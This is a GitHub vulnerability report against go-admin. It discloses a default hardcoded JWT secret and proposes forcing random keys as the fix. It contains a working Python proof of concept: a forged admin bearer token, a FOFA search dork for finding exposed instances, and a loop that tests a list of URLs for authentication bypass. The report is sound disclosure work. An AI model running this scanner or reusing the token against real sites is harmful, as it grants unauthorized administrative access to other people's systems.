Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[Vulnerability] go-admin JWT HardCoded #716

Closed
runningdown opened this issue Oct 12, 2022 · 1 comment
Closed

[Vulnerability] go-admin JWT HardCoded #716

runningdown opened this issue Oct 12, 2022 · 1 comment

Comments

@runningdown
Copy link

Description:

Although the configuration file has prompted that the token needs to be modified, most users will still copy a directly if the change is not forced. The key of Jwt is still 'go admin', including the production environment.
image

You can use a common jwt to access the API
image

POC:

# fofadork: icon_hash="-1533452521"
import requests

proxy={'http':None,'https':None}

def req(url):
    header = {'Authorization': 'Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkYXRhc2NvcGUiOiIiLCJleHAiOjQ4MTg5MTg2MzAsImlkZW50aXR5IjoxLCJuaWNlIjoiYWRtaW4iLCJvcmlnX2lhdCI6MTY2NTI4MjYzMCwicm9sZWlkIjoxLCJyb2xla2V5IjoiYWRtaW4iLCJyb2xlbmFtZSI6Iuezu-e7n-euoeeQhuWRmCJ9.D08ymyYAo6giFJd8XEhqo6yjIaIZzfg0mi4j28rwwoc'}
    uri = "/api/v1/getinfo"
    s = requests.session()
    res = s.get(url+uri,headers=header,proxies=proxy,timeout=5)
    if "requestId" in res.text:
        print(url)
        print(res.text)

with open('url.txt') as f:
    file = f.readlines()

for i in file:
    x = i.strip("\n")
    try:
        req(x)
    except:
        pass

Randomly test multiple go admins. It is found that most URLs can bypass the authentication access API directly through the tampered Jwt. The figure shows the getinfo interface (if you want to attack, you can directly add users with administrator privileges by adding user interfaces).
image

Fix

Force random uuids for jwt keys

@wenjianzhang
Copy link
Member

jwt的secret 通常用户都会修改的,而且有明确提示。

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants